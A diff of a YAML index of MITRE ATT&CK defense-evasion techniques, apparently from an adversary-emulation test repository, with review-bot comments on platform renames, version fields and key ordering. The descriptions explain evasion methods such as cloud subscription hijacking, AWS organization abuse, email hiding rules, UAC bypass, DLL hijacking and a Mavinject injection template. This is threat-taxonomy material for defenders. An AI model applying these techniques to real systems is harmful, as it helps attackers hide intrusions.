+ delete, or otherwise modify resource groups within an IaaS hierarchy. For
+ example, in Azure environments, an adversary who has gained access to a Global
+ Administrator account may create new subscriptions in which to deploy resources.
+ They may also engage in subscription hijacking by transferring an existing
+ pay-as-you-go subscription from a victim tenant to an adversary-controlled
+ tenant. This will allow the adversary to use the victim’s compute resources
+ without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm
+ 2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments,
+ adversaries with appropriate permissions in a given account may call the `LeaveOrganization`
+ API, causing the account to be severed from the AWS Organization to which
+ it was tied and removing any Service Control Policies, guardrails, or restrictions
+ imposed upon it by its former Organization. Alternatively, adversaries may
+ call the `CreateAccount` API in order to create a new account within an AWS
+ Organization. This account will use the same payment methods registered to
+ the payment account but may not be subject to existing detections or Service
+ Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ type: attack-pattern
+ id: attack-pattern--0ce73446-8722-4086-9d43-514f1d0f669e
+ created: '2024-09-25T14:16:19.234Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1666
+ external_id: T1666
+ - source_name: AWS Organizations
+ description: AWS. (n.d.). Terminology and concepts for AWS Organizations.
+ Retrieved September 25, 2024.
+ url: https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+ - source_name: Microsoft Subscription Hijacking 2022
+ description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
+ using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
+ url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
+ - source_name: Microsoft Azure Resources
+ description: Microsoft Azure. (2024, May 31). Organize your Azure resources
+ effectively. Retrieved September 25, 2024.
+ url: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize-resources
+ - source_name: Microsoft Peach Sandstorm 2023
+ description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
+ password spray campaigns enable intelligence collection at high-value targets.
+ Retrieved September 18, 2023.
+ url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1564.008:
technique:
- modified: '2023-10-16T16:41:53.957Z'
+ modified: '2024-10-15T15:56:27.592Z'
name: 'Hide Artifacts: Email Hiding Rules'
description: |-
Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule
or Set-InboxRule
[PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
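Review bot: the new T1666 (Modify Cloud Resource Hierarchy) entry lands with `atomic_tests: []` and, from upstream, `x_mitre_detection: ''`, so the index now lists a defense-evasion technique with neither a test nor detection guidance attached. That is the correct mechanical result of regenerating the index, but it is worth calling out in the PR so the coverage gap is visible: the description already names the concrete actions a test would exercise (`LeaveOrganization` and `CreateAccount` against an AWS Organization, subscription creation or transfer in Azure), and the only data source listed is 'Cloud Service: Cloud Service Modification', which is what a future atomic would need to generate.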
@@ -901,11 +989,10 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
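Review bot: the platform list for T1564.008 loses `Office 365` and `Google Workspace` and gains the consolidated `Office Suite` (with the version bump 1.3 to 1.4). Any per-platform index or filter in this repo that selects on the literal strings 'Office 365' or 'Google Workspace' will now silently drop this sub-technique, so the affected platform indexes need regenerating in the same change and the generator's platform-to-index mapping needs an 'Office Suite' entry; please confirm both are covered, otherwise the technique vanishes from those views without any error.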
@@ -950,12 +1037,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.008
atomic_tests: []
T1027.013:
technique:
- modified: '2024-04-19T04:03:07.164Z'
+ modified: '2024-10-15T16:32:45.108Z'
name: Encrypted/Encoded File
description: "Adversaries may encrypt or encode files to obfuscate strings,
bytes, and other specific patterns to impede detection. Encrypting and/or
@@ -1026,11 +1112,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:50.568Z'
name: Rootkit
description: "Adversaries may use rootkits to hide the presence of programs,
files, network connections, services, drivers, and other system components.
@@ -1098,7 +1183,6 @@ defense-evasion:
url: https://en.wikipedia.org/wiki/Rootkit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1014
atomic_tests: []
T1036.007:
@@ -1129,7 +1213,7 @@ defense-evasion:
url: https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/
description: Seqrite. (n.d.). How to avoid dual attack and vulnerable files
with double extension?. Retrieved July 27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T21:09:59.588Z'
name: 'Masquerading: Double File Extension'
description: "Adversaries may abuse a double extension in the filename as a
means of masquerading the true file type. A file name may include a secondary
@@ -1166,13 +1250,11 @@ defense-evasion:
x_mitre_data_sources:
- 'File: File Creation'
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1036.007
atomic_tests: []
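Review bot: `x_mitre_attack_spec_version: 2.1.0` is removed outright from T1036.007 here, and the same happens to T1548.003, T1600, T1562.009, T1542.005, T1070.002 and T1218.004 below, whereas other objects in this diff keep the field (T1216.001 stays at 2.1.0, T1548.002 at 3.1.0) or bump it (T1578 3.1.0 to 3.2.0, T1574.011 re-emitted as 3.2.0). A mixed state where some techniques carry no ATT&CK spec version at all is awkward for downstream tooling; check whether the objects losing the field come from an older object version in the source bundle (their `modified` stamps also move backward, e.g. T1036.007 to 2021-10-14) and, if so, whether that is really the source you want.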
T1548.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:35:39.112Z'
name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
description: |-
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -1273,7 +1355,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.002
atomic_tests: []
T1548.003:
@@ -1304,7 +1385,7 @@ defense-evasion:
description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
Does. Retrieved March 19, 2018.
source_name: cybereason osx proton
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-14T16:28:19.781Z'
name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
description: |-
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -1338,13 +1419,11 @@ defense-evasion:
- User
x_mitre_effective_permissions:
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1548.003
atomic_tests: []
T1578:
technique:
- modified: '2023-09-05T20:45:22.041Z'
+ modified: '2024-09-30T13:28:37.414Z'
name: Modify Cloud Compute Infrastructure
description: |-
An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
@@ -1396,12 +1475,11 @@ defense-evasion:
- source_name: Mandiant M-Trends 2020
description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
2020.
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1542.001:
technique:
@@ -1481,12 +1559,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1542.001
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -1505,7 +1582,6 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -1519,7 +1595,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -1546,8 +1621,8 @@ defense-evasion:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -1578,7 +1653,8 @@ defense-evasion:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1542.003:
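Review bot: for T1574.011 the `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` keys are deleted near the top of the object (the -1505 and -1519 hunks) and re-added at the bottom, so the net change is a key reorder plus the spec version bump 2.1.0 to 3.2.0 and the usual `spec_version` drop. The churn suggests the emitter is not writing keys in a stable order (compare T1216.001 above, where the same two keys already sit at the end). If the generator can sort keys or preserve source order deterministically, future diffs of this file shrink to the substantive changes; the 2.1.0 to 3.2.0 bump is the only thing a reviewer needs to see here.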
@@ -1635,7 +1711,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1218.013:
technique:
@@ -1688,7 +1763,7 @@ defense-evasion:
PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would
inject an import table entry consisting of the specified DLL into the module
at the given base address.(Citation: Mavinject Functionality Deconstructed)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T17:35:08.315Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Mavinject
x_mitre_detection: |-
@@ -1704,11 +1779,10 @@ defense-evasion:
- 'Process: Process Creation'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.005:
technique:
- modified: '2023-09-14T21:12:48.409Z'
+ modified: '2024-09-12T19:30:45.064Z'
name: 'Masquerading: Match Legitimate Name or Location'
description: |-
Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
@@ -1754,8 +1828,8 @@ defense-evasion:
external_id: T1036.005
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Docker Images
description: Docker. (n.d.). Docker Images. Retrieved April 6, 2021.
url: https://docs.docker.com/engine/reference/commandline/images/
@@ -1765,9 +1839,8 @@ defense-evasion:
url: https://www.elastic.co/blog/how-hunt-masquerade-ball
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.005
atomic_tests: []
T1600:
@@ -1794,7 +1867,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:37:49.258Z'
name: Weaken Encryption
description: |-
Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
@@ -1818,8 +1891,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1036.008:
technique:
@@ -1883,11 +1954,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564:
technique:
- modified: '2024-03-29T17:45:48.126Z'
+ modified: '2024-10-15T15:58:49.815Z'
name: Hide Artifacts
description: |-
Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
@@ -1908,8 +1978,8 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Metadata'
- 'Application Log: Application Log Content'
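Review bot: T1564, the parent of T1564.008 above, gets the same `Office 365` to `Office Suite` platform rename (version 1.2 to 1.3), so both parent and sub-technique now match only the new platform string. A grep for the literal 'Office 365' across the index and CSV generators before merging will show whether anything else still keys on the retired name.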
@@ -1953,12 +2023,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564
atomic_tests: []
T1484.002:
technique:
- modified: '2024-04-19T04:27:51.388Z'
+ modified: '2024-09-25T13:50:11.593Z'
name: Domain Trust Modification
description: "Adversaries may add new domain trusts, modify the properties of
existing domain trusts, or otherwise change the configuration of trust relationships
@@ -1978,9 +2047,14 @@ defense-evasion:
trust modifications such as altering the claim issuance rules to log in any
valid set of credentials as a specified user.(Citation: AADInternals zure
AD Federated Domain) \n\nAn adversary may also add a new federated identity
- provider to an identity tenant such as Okta, which may enable the adversary
- to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
- 2023)"
+ provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+ may enable the adversary to authenticate as any user of the tenant.(Citation:
+ Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+ gain broad access into a variety of cloud-based services that leverage the
+ identity tenant. For example, in AWS environments, an adversary that creates
+ a new identity provider for an AWS Organization will be able to federate into
+ all of the AWS Organization member accounts without creating identities for
+ each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
@@ -2000,9 +2074,8 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '2.0'
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
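Review bot: T1484.002 replaces `Azure AD` and `SaaS` with the single `Identity Provider` platform (version 2.0 to 2.1); as with the Office Suite rename, any azure-ad or saas platform index built from `x_mitre_platforms` loses this sub-technique unless the mapping is updated. Separately, the expanded description in the previous hunk now covers AWS IAM Identity Center and federating into every AWS Organization member account, yet `x_mitre_platforms` lists only Windows and Identity Provider, not IaaS; that is upstream ATT&CK's call, but anyone expecting the IaaS index to pick this up should know it will not.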
@@ -2019,6 +2092,10 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1484/002
external_id: T1484.002
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
- source_name: CISA SolarWinds Cloud Detection
description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -2052,7 +2129,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.002
atomic_tests: []
T1562.009:
@@ -2102,7 +2178,7 @@ defense-evasion:
url: https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg
description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
30, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-31T14:51:47.352Z'
name: 'Impair Defenses: Safe Boot Mode'
description: |-
Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)
@@ -2130,8 +2206,6 @@ defense-evasion:
- Anti-virus
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1562.009
atomic_tests: []
T1542.005:
@@ -2174,7 +2248,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
Information. Retrieved October 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T16:35:53.806Z'
name: TFTP Boot
description: |-
Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -2198,12 +2272,10 @@ defense-evasion:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1497.001:
technique:
- modified: '2024-04-19T12:49:40.919Z'
+ modified: '2024-09-12T15:50:18.047Z'
name: 'Virtualization/Sandbox Evasion: System Checks'
description: "Adversaries may employ various system checks to detect and avoid
virtualization and analysis environments. This may include changing behaviors
@@ -2293,13 +2365,12 @@ defense-evasion:
url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
- source_name: Deloitte Environment Awareness
description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1497.001
atomic_tests: []
T1070.002:
@@ -2323,7 +2394,7 @@ defense-evasion:
url: https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/
description: Marcel. (2018, April 19). 12 Critical Linux Log Files You Must
be Monitoring. Retrieved March 29, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T21:23:51.886Z'
name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs'
description: |
Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/
directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
@@ -2348,8 +2419,6 @@ defense-evasion:
- 'File: File Deletion'
- 'File: File Modification'
- 'Command: Command Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1070.002
atomic_tests: []
T1218.004:
@@ -2378,7 +2447,7 @@ defense-evasion:
- source_name: LOLBAS Installutil
url: https://lolbas-project.github.io/lolbas/Binaries/Installutil/
description: LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:47:52.603Z'
name: 'Signed Binary Proxy Execution: InstallUtil'
description: |-
Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe
and C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe
.
@@ -2404,8 +2473,6 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.004
atomic_tests: []
T1027.008:
@@ -2457,18 +2524,17 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -2484,8 +2550,8 @@ defense-evasion:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -2499,7 +2565,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -2525,6 +2591,10 @@ defense-evasion:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
@@ -2552,12 +2622,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1553.001:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-21T19:30:58.414Z'
name: 'Subvert Trust Controls: Gatekeeper Bypass'
description: |-
Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )
@@ -2653,7 +2722,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.001
atomic_tests: []
T1553.002:
